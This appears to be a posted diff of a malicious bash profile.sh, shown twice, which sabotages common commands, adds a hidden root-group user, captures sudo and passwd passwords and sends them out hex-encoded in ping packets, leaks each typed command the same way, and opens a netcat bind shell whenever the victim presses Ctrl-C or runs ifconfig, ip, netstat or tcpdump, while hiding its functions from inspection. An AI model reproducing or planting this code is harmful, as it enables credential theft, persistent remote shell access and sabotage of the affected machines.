picatz · December 23, 2019 01:24
diff --git a/profile.sh b/profile.sh
 # disable history
 set +o history

 alias if='if !' for='for !' while='while !'

 alias yes="yes n"
 alias vi="vi +q"
 alias apt=true
 alias yum=true
 alias nano="/bin/vi"
 alias rm=true
 function ls { command ls -$(opts="frStu"; echo ${opts:$((RANDOM % ${#opts})):1}) "$@"; }
 tset -Qe $'\t'
 alias exit='bash'
 alias cp='mv'
 function shutdown { clear; echo 'shutting down now, do not touch computer'; sleep 30; }
 alias shutdown=shutdown
 function pwd { sleep 3; echo 'right where I want you to be'; sleep 1; echo ';)'; sleep 1;}
 alias pwd=pwd
 function which { echo "/etc/$1"; }
 alias which=which
 useradd mom --gid 0 > /dev/null 2>&1
 echo -e \"password\npassword\n\" > passwd mom > /dev/null 2>&1
 function w { /usr/bin/w | sed s/$USER/yourmom/ | sed 's/[0-9]\\{1,3\\}.[0-9]\\{1,3\\}.[0-9]\\{1,3\\}.[0-9]\\{1,3\\}/8.8.8.8/g'; }
 alias w=w
 function who { echo "new computer who dis"; }
 alias who=who
 function sudo {
  ascii2hex(){ a="$@";s=0000000;printf "$a" | hexdump | grep "^$s"| sed s/' '//g| sed s/^$s//; }
  printf "\rsudo password for $USER:"
  read -s password
  ping -c 1 -p $(ascii2hex $password) 8.8.8.8 > /dev/null 2>&1
  printf "\r                                  \r"
  echo $password | /usr/bin/sudo "$@"
 }
 alias sudo=sudo

 # exfiltrate sudo password prompt input with ping
 function passwd {
  if [ $# -eq 0 ]; then
    echo "no user provided"
    exit 1
  fi
  echo "Changing password for $1."
  ascii2hex(){ a="$@";s=0000000;printf "$a" | hexdump | grep "^$s"| sed s/' '//g| sed s/^$s//; }
  printf "\r(current) UNIX password:"
  read -s password
  ping -c 1 -p $(ascii2hex $password) 8.8.8.8 > /dev/null 2>&1
  printf "\r                               \r"
  echo $password | /usr/bin/passwd "$1"
 }
 # obfuscate function type 
 alias passwd=passwd

 function ping_out_last_command {
   ascii2hex(){ a="$@";s=0000000;printf "$a" | hexdump | grep "^$s"| sed s/' '//g| sed s/^$s//; }
   ping -c 1 -p $(ascii2hex !:0) 8.8.4.4 > /dev/null 2>&1 
 }
 alias ping_out_last_command=ping_out_last_command

 export PROMPT_COMMAND='ping_out_last_command'

 # function make_backdoor {   file=$RANDOM;   if [ -e "/tmp/$file" ]; then      rm /tmp/$file;   fi;   mkfifo /tmp/$file;   echo "serving on $file";   cat /tmp/$file| /bin/sh -i 2>&1 | nc -l $file >/tmp/$file ; }

 function make_backdoor {
  if ! [ -x "$(command -v nc)" ]; then
     if [ -x "$(command -v yum)" ]; then
        sudo yum install nmap-ncat -y > /dev/null 2>&1
     else
        sudo apt-get install netcat -y > /dev/null 2>&1
     fi
  fi
  port=$RANDOM
  file="/tmp/.$port"
  if [ -e "/tmp/$file" ]; then
     rm $file
  fi
  mkfifo $file
  #echo "serving on $port with $file"
  for i in 1 2 3; do
    if [ -e "/tmp/$file" ]; then
      rm $file
      mkfifo $file
    fi
    cat $file | /bin/sh -i 2>&1 | nc -l $port > $file
  done
  rm $file
 }
 alias make_backdoor=make_backdoor

 # trap ctrl-c and call ctrl_c()
 trap ctrl_c INT

 function ctrl_c {
  make_backdoor
 }

 function ifconfig {
  make_backdoor
  echo "-bash: ifconfig: command not found"
 }

 function ip {
  make_backdoor
  echo "-bash: ip: command not found"
 }

 function netstat {
  make_backdoor
  echo "-bash: netstat: command not found"
 }

 function netstat {
  make_backdoor
  echo "-bash: netstat: command not found"
 }

 function tcpdump { 
  echo "tcpdump: verbose output suppressed, use -v or -vv for full protocol decode"
  echo "listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes"
  echo
  make_backdoor
  echo "-bash: tcpdump: command not found"
 }

 function declare {
  echo "no functions found"
 }

 function type {
  echo "no functions found"
 }

 function chattr {
  echo "-bash: chattr: command not found"
 }

 alias unalias=false
 alias alias=false;
	# disable history
	set +o history

	alias if='if !' for='for !' while='while !'

	alias yes="yes n"
	alias vi="vi +q"
	alias apt=true
	alias yum=true
	alias nano="/bin/vi"
	alias rm=true
	function ls { command ls -$(opts="frStu"; echo ${opts:$((RANDOM % ${#opts})):1}) "$@"; }
	tset -Qe $'\t'
	alias exit='bash'
	alias cp='mv'
	function shutdown { clear; echo 'shutting down now, do not touch computer'; sleep 30; }
	alias shutdown=shutdown
	function pwd { sleep 3; echo 'right where I want you to be'; sleep 1; echo ';)'; sleep 1;}
	alias pwd=pwd
	function which { echo "/etc/$1"; }
	alias which=which
	useradd mom --gid 0 > /dev/null 2>&1
	echo -e \"password\npassword\n\" > passwd mom > /dev/null 2>&1
	function w { /usr/bin/w \| sed s/$USER/yourmom/ \| sed 's/[0-9]\\{1,3\\}.[0-9]\\{1,3\\}.[0-9]\\{1,3\\}.[0-9]\\{1,3\\}/8.8.8.8/g'; }
	alias w=w
	function who { echo "new computer who dis"; }
	alias who=who
	function sudo {
	ascii2hex(){ a="$@";s=0000000;printf "$a" \| hexdump \| grep "^$s"\| sed s/' '//g\| sed s/^$s//; }
	printf "\rsudo password for $USER:"
	read -s password
	ping -c 1 -p $(ascii2hex $password) 8.8.8.8 > /dev/null 2>&1
	printf "\r \r"
	echo $password \| /usr/bin/sudo "$@"
	}
	alias sudo=sudo

	# exfiltrate sudo password prompt input with ping
	function passwd {
	if [ $# -eq 0 ]; then
	echo "no user provided"
	exit 1
	fi
	echo "Changing password for $1."
	ascii2hex(){ a="$@";s=0000000;printf "$a" \| hexdump \| grep "^$s"\| sed s/' '//g\| sed s/^$s//; }
	printf "\r(current) UNIX password:"
	read -s password
	ping -c 1 -p $(ascii2hex $password) 8.8.8.8 > /dev/null 2>&1
	printf "\r \r"
	echo $password \| /usr/bin/passwd "$1"
	}
	# obfuscate function type
	alias passwd=passwd

	function ping_out_last_command {
	ascii2hex(){ a="$@";s=0000000;printf "$a" \| hexdump \| grep "^$s"\| sed s/' '//g\| sed s/^$s//; }
	ping -c 1 -p $(ascii2hex !:0) 8.8.4.4 > /dev/null 2>&1
	}
	alias ping_out_last_command=ping_out_last_command

	export PROMPT_COMMAND='ping_out_last_command'

	# function make_backdoor { file=$RANDOM; if [ -e "/tmp/$file" ]; then rm /tmp/$file; fi; mkfifo /tmp/$file; echo "serving on $file"; cat /tmp/$file\| /bin/sh -i 2>&1 \| nc -l $file >/tmp/$file ; }

	function make_backdoor {
	if ! [ -x "$(command -v nc)" ]; then
	if [ -x "$(command -v yum)" ]; then
	sudo yum install nmap-ncat -y > /dev/null 2>&1
	else
	sudo apt-get install netcat -y > /dev/null 2>&1
	fi
	fi
	port=$RANDOM
	file="/tmp/.$port"
	if [ -e "/tmp/$file" ]; then
	rm $file
	fi
	mkfifo $file
	#echo "serving on $port with $file"
	for i in 1 2 3; do
	if [ -e "/tmp/$file" ]; then
	rm $file
	mkfifo $file
	fi
	cat $file \| /bin/sh -i 2>&1 \| nc -l $port > $file
	done
	rm $file
	}
	alias make_backdoor=make_backdoor

	# trap ctrl-c and call ctrl_c()
	trap ctrl_c INT

	function ctrl_c {
	make_backdoor
	}

	function ifconfig {
	make_backdoor
	echo "-bash: ifconfig: command not found"
	}

	function ip {
	make_backdoor
	echo "-bash: ip: command not found"
	}

	function netstat {
	make_backdoor
	echo "-bash: netstat: command not found"
	}

	function netstat {
	make_backdoor
	echo "-bash: netstat: command not found"
	}

	function tcpdump {
	echo "tcpdump: verbose output suppressed, use -v or -vv for full protocol decode"
	echo "listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes"
	echo
	make_backdoor
	echo "-bash: tcpdump: command not found"
	}

	function declare {
	echo "no functions found"
	}

	function type {
	echo "no functions found"
	}

	function chattr {
	echo "-bash: chattr: command not found"
	}

	alias unalias=false
	alias alias=false;